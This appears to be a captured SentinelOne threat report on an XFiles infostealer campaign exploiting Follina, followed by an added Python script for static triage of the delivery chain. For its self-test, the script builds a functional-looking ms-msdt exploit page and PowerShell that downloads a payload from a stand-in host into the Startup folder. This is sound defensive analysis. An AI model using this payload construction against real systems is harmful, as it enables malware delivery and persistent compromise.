Submitted URL: https://customer-success-links.totango.co/ss/c/iXmfWo-LE_wkLRkK4Wv5P1pl7_AP3Pc9zyyM5ViJWx_Pw4bghDn4JTsq_0qGpqPwrF1ynGgyOFoncIf35qPbjS-Hgjl...
Effective URL: https://assets.sentinelone.com/customer-watchtower-white/xfiles-infostealer-follina-wt
Submission: On August 23 via manual from IN — Scanned from DE
XFiles InfoStealer Campaign Exploits Follina

Document Type: WatchTower Flash Report
TLP: Amber
Date of Publication: 13 July 2022
Date of Research: 13 July 2022
Cyber Risk Rating: Elevated
Threat Actors / Malware Families Referenced: XFiles Infostealer, Follina, CVE-2022-30190

Key Takeaways:
● WatchTower analysts are monitoring an XFiles infostealer campaign that is actively exploiting CVE-2022-30190 (aka Follina), a vulnerability in the Microsoft Support Diagnostic Tool (MSDT).
● XFiles is an infostealer that has been active since 2021. It primarily steals sensitive browser data such as history, cookies, passwords and credit card information, and it also targets credentials for FTP, cryptocurrency wallets, Telegram channels and Discord accounts.
● XFiles is sold primarily through Telegram channels under multiple subscription plans. Its developers have also added a miner module to the infostealer, expanding its capabilities.
● Readers can access our previous coverage of attackers leveraging Follina here and here.

Technical Details:
In the campaign we observed, the attacker uses a malicious Microsoft Word document designed to exploit the Follina vulnerability and download XFiles onto the victim's system. The Word file carries a malicious link in the document's external OLE object relationship (an oleObject relationship whose Target is an external URL rather than an embedded object), as depicted in the image below. The link points to a weaponized HTML file hosted on attacker-controlled infrastructure. When a victim previews or opens the document, Word fetches that HTML and the infection chain begins.

Figure: Malicious Link Embedded Into Follina Document's External Reference Entity.

The image below shows the contents of the downloaded HTML file. The portion of the code that attempts to exploit the MSDT vulnerability is highlighted.

Figure: Follina Exploit Code In Downloaded HTML File.

The obfuscated PowerShell carried in the HTML file is then decoded. It downloads a secondary payload from the attacker's C2 infrastructure, writes it into the Windows Startup folder to maintain persistence, and executes it.

Figure: PowerShell Deobfuscated Content That Adds Persistence.

The secondary payload (named ChimLacUpdate.exe in the campaign we observed) is shellcode that downloads and executes the final XFiles payload from the C2 infrastructure. The ChimLacUpdate.exe binary does not carry a valid signature: its signature metadata claims the file was signed by Bkav Corporation, a Vietnamese antivirus company. We therefore conclude that XFiles' developers are using a fake Bkav certificate to deceive their victims. When triaging such a sample, verify the Authenticode chain (for example with Get-AuthenticodeSignature) rather than trusting the signer name displayed in the file's properties.
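The delivery chain described above (external OLE relationship in the .docx, ms-msdt: redirect in the HTML, base64-wrapped PowerShell that drops a payload into the Startup folder) can be triaged statically. The following is an added example and is not part of the original report or SentinelOne's code. It builds a constructed .docx and HTML page in memory that mirror the structure of public Follina samples rather than the campaign's own files; the host 203.0.113.10, the path /index.html and the exact PowerShell are assumptions used only so the script runs offline.

```python
"""Static triage helpers for the Follina (CVE-2022-30190) delivery chain.

Added example, not SentinelOne's code. The .docx and HTML it inspects are
constructed in memory to mirror public Follina samples; 203.0.113.10,
/index.html and the PowerShell text are illustrative assumptions.
"""
import base64
import io
import re
import xml.etree.ElementTree as ET
import zipfile

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OLE_REL = ("http://schemas.openxmlformats.org/officeDocument/2006/"
           "relationships/oleObject")


# Stage 1: the Word document. A Follina lure points an oleObject relationship
# at an external URL (TargetMode="External") instead of an embedded object.
def external_ole_targets(docx_bytes: bytes) -> list[str]:
    """Return http(s) oleObject relationship targets found in word/_rels/*.rels."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        for name in zf.namelist():
            if name.startswith("word/_rels/") and name.endswith(".rels"):
                root = ET.fromstring(zf.read(name))
                for rel in root.iter(f"{{{REL_NS}}}Relationship"):
                    target = rel.get("Target", "")
                    if (rel.get("Type") == OLE_REL
                            and rel.get("TargetMode") == "External"
                            and target.lower().startswith(("http://", "https://"))):
                        hits.append(target)
    return hits


# Stage 2: the HTML page. It redirects to an ms-msdt: URI whose IT_BrowseForFile
# parameter carries PowerShell wrapped in Invoke-Expression/FromBase64String.
MSDT_URI = re.compile(r"ms-msdt:/id\s+PCWDiagnostic", re.IGNORECASE)
# Matches the plain form FromBase64String("...") and the obfuscated
# FromBase64String('+[char]34+'...'+[char]34+') seen in Follina pages.
B64_ARG = re.compile(r"FromBase64String\(\s*(?:'\+\[char\]34\+'|[\"'])([A-Za-z0-9+/=]{8,})")
STARTUP_DIR = re.compile(
    r"start menu\\+programs\\+startup|GetFolderPath\(['\"]Startup['\"]\)", re.IGNORECASE)


def analyse_follina_html(html: str) -> dict:
    """Decode the staged PowerShell and pull out download and persistence indicators."""
    result = {"msdt_uri": bool(MSDT_URI.search(html)), "powershell": None,
              "download_urls": [], "startup_persistence": False}
    m = B64_ARG.search(html)
    if m:
        ps = base64.b64decode(m.group(1)).decode("utf-8", errors="replace")
        result["powershell"] = ps
        result["download_urls"] = re.findall(r"https?://[^\s'\"]+", ps)
        result["startup_persistence"] = bool(STARTUP_DIR.search(ps))
    return result


# Constructed samples (not the campaign's artefacts) so the helpers run offline.
SAMPLE_PS = ("$u='http://203.0.113.10/ChimLacUpdate.exe';"
             '$d="$env:APPDATA\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\ChimLacUpdate.exe";'
             "Invoke-WebRequest -Uri $u -OutFile $d;Start-Process $d")


def build_sample_docx(external: bool = True) -> bytes:
    """Minimal .docx whose document.xml.rels either points at an external URL
    (Follina-style, trailing '!' as seen in public samples) or at an embedded object."""
    if external:
        rel = (f'<Relationship Id="rId5" Type="{OLE_REL}" '
               'Target="http://203.0.113.10/index.html!" TargetMode="External"/>')
    else:
        rel = f'<Relationship Id="rId5" Type="{OLE_REL}" Target="embeddings/oleObject1.bin"/>'
    rels = ('<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
            f'<Relationships xmlns="{REL_NS}">{rel}</Relationships>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("word/document.xml", "<placeholder/>")  # body is irrelevant here
        zf.writestr("word/_rels/document.xml.rels", rels)
    return buf.getvalue()


def build_sample_html() -> str:
    """Redirect-to-ms-msdt: page with the PowerShell base64-encoded and wrapped the
    way public Follina pages obfuscate it ([char]58 is ':' and [char]34 is '"')."""
    b64 = base64.b64encode(SAMPLE_PS.encode()).decode()
    ps_wrapper = (
        "$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+"
        "'UTF8.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'"
        + b64 + "'+[char]34+'))'))))")
    return ('<script>window.location.href = "ms-msdt:/id PCWDiagnostic /skip force /param '
            '\\"IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile='
            + ps_wrapper +
            'i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe\\"";'
            '</script>')


if __name__ == "__main__":
    print("external OLE targets:", external_ole_targets(build_sample_docx()))
    print(analyse_follina_html(build_sample_html()))
```

On a real sample, feed `external_ole_targets` the .docx bytes and `analyse_follina_html` the fetched (or cached) HTML; a non-empty target list plus a decoded script that writes under the Startup folder is the combination the report describes, and the decoded URL list is what to block and hunt for.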